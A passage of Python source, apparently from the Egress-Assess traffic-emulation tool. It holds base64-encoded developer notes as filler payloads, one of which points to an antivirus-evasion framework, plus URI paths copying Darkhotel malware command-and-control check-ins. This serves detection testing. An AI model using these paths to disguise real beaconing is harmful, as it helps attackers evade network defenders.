'U3RldmUgaXMgdGhlIG1hbiwgYW5kIGhhcyBiZWVuIGdyZWF0IHRvIHdvcmsgd2l0aCBvbiBFZ3Jlc3MtQXNzZXNzLiAgSGUgd2FzIGFjdHVhbGx5IHRoZSBvbmUgd2hvIGNhbWUgdXAgd2l0aCB0aGUgaWRlYSBvZiBoYXZpbmcgdXMgZW11bGF0ZSBkaWZmZXJlbnQgcGllY2VzIG9mIG1hbHdhcmUgb3IgaGFja2luZyBncm91cHMuICBXZSB0YWxrZWQgYWJvdXQgaXQgYW5kIHRob3VnaHQgaXQgd2FzIGEgZ3JlYXQgaWRlYSwgc28gaGVyZSB3ZSBhcmUh',
|
||||
'VGhpcyBpcyBwcm9iYWJseSB0aGUgY2xvc2VzdCB0aGluZyB0byBhbiBlYXN0ZXIgZWdnIHRoYXQgd2UgaGF2ZSBjdXJyZW50bHkgaW4gRWdyZXNzLUFzc2Vzcy4gIFRoZXJlIGlzIG5vdCBhIGxvdCBvZiBvdGhlciBhcmVhcyB3aGVyZSBhbnl0aGluZyBjb3VsZCByZWFsbHkgYmUgaGlkZGVuIHdpdGhpbiB0aGlzIHByb2dyYW0sIGJ1dCBpdCB3b3VsZCBiZSBraW5kIG9mIGZ1bm55IHRvIGhlYXIgaWYgYW55b25lIGVsc2UgYWN0dWFsbHkgZmluZHMgdGhpcyBkYXRhLg--',
|
||||
'T25lIHRoaW5nIHRoYXQgSSBkZWZpbml0ZWx5IGhhdmUgbGVhcm5lZCBpcyB0aGF0IGl0IGlzIGhhcmQgdG8gd29yayBvbiB3cml0aW5nIGRpZmZlcmVudCBzb2Z0d2FyZSBhbmQgaGF2ZSB0d28ga2lkcyBhdCB0aGUgc2FtZSB0aW1lLiAgSG9wZWZ1bGx5IEkgd2lsbCBiZSBhYmxlIHRvIGRvIHRoaXMsIGJ1dCBpdCB3aWxsIGJlIGEgbG90IGZhc3RlciBvbmNlIHRoZSBraWRzIGdldCBhIGxpdHRsZSBiaXQgb2xkZXIgYW5kIEkgY2FuIHRoZW4gc3BlbmQgbW9yZSB0aW1lIG9uIHRoaXMu',
|
||||
'U28gZmFyLCB3ZSBkbyBub3QgYWN0dWFsbHkgaGF2ZSBhbnlvbmUgdGhhdCBoYXMgc3VibWl0dGVkIGFueSBwdWxsIHJlcXVlc3RzIHRvIEVncmVzcy1Bc3Nlc3MuICBXZSBkZWZpbml0ZWx5IHRoaW5rIGl0IHdvdWxkIGJlIGF3ZXNvbWUgaWYgc29tZW9uZSBlbHNlIGFkZGVkIHNvbWUgZmVhdHVyZXMgdG8gRWdyZXNzLUFzc2Vzcywgb3Igc2VuZCB1cyBtb2R1bGVzIHNvIHRoYXQgd2UgY2FuIGdldCBpdCBhZGRlZCBpbiB0byB0aGUgdG9vbCE-',
|
||||
'VGhpcyB3aWxsIG1ha2UgbGlmZSBlYXN5LCBob3BlZnVsbHkgZXZlcnlvbmUgaXMgYWJsZSB0byB1c2UgdGhpcyB0b29sIHRvIHRlc3QgaWYgdGhlaXIgbmV0d29ya3MgYWN0dWFsbHkgY2F0Y2ggYW55IG9mIHRoZSBkYXRhIGxlYXZpbmcgdGhlaXIgbmV0d29yaywgb3IgYW55IG9mIHRoZSBwaWVjZXMgb2YgbWFsd2FyZSBvcGVyYXRpbmcgd2l0aGluIHRoZWlyIG5ldHdvcmsuICBZb3Ugc2hvdWxkIGFsbCB0ZXN0IGl0IG91dCBhbmQgc2VlIGlmIHlvdSBjYW4gY2F0Y2ggdGhpcyE-',
|
||||
'V2VsbCB0aGlzIGlzIGdvaW5nIHRvIGJlIHRoZSBsYXN0IGV0dW1ib3QgcmVzcG9uc2UgZm9yIG5vdy4gIElmIHNvbWVvbmUgZWxzZSBpcyBhY3R1YWxseSByZWFkaW5nIHRoZXNlLCB5b3Ugc2hvdWxkIGRlbW9uc3RyYXRlIHRoYXQgeW91IGhhdmUgcmVhZCB0aGVzZSBieSBhZGRpbmcgYSByZXNwb25zZSBzcGVjaWZpY2FsbHkgdGhpcyBldHVtYm90IHJlc3BvbnNlcy4gIEl0IHdpbGwgYmUgdGhpcyBsaXR0bGUgZWFzdGVyZWdnIDop',
|
||||
'SSB3b3VsZCByZWFsbHkgbGlrZSB0byB0aGluayB0aGF0IGF0IHNvbWUgcG9pbnQgSSBoYXZlIGdlbmVyYXRlZCBlbm91Z2ggb2YgdGhlc2UgZW5jb2RlZCBtb2R1bGVzLiAgSW4gdGhlIG1lYW50aW1lLCBzb21lIGZpbGxlciEgIFlvdSBndXlzIHNob3VsZCBiZSBzdXJlIHRvIGdvIHZpc2l0IG15IHdlYiBwYWdlIGF0IGNocmlzdG9waGVydHJ1bmNlci5jb20gYmVjYXVzZSBJIHRyeSB0byB3cml0ZSBzb21lIHVzZWZ1bCBhcnRpY2xlcyB0aGVyZSB0aGF0IGhlbHAgb3RoZXJzIGluIHRoZSBjb21tdW5pdHkh',
|
||||
'QW5kIHRoaXMgaXMgYWN0dWFsbHkgdGhlIGxhc3Qgb25lIHRoYXQgSSBhbSBtYWtpbmcuICBJZiB5b3UgZ3V5cyB3YW50IHRvIGxlYXJuIGhvdyB0byBieXBhc3MgYW50aXZpcnVzLCBlc3BlY2lhbGx5IHNpbmNlIGl0IHJlYWxseSBpcyBqdXN0IGEgam9rZSwgeW91IHNob3VsZCBiZSBzdXJlIHRvIHBsYXkgYXJvdW5kIHdpdGggVmVpbC1FdmFzaW9uIGFuZCBsZWFybiBob3cgdG8gdXNlIGl0IGF0IHZlaWwtZnJhbWV3b3JrLmNvbS4gIEkgaG9wZSB0aGF0IHRoYXQgaGVscHMh']
|
||||
|
||||
darkhotel_checkin = '/major/images/view.php'
|
||||
darkhotel_checkin2 = '/major/txt/read.php'
|
||||
darkhotel_uri = '/bin/read_i.php?a1='
|
Loading…
Reference in New Issue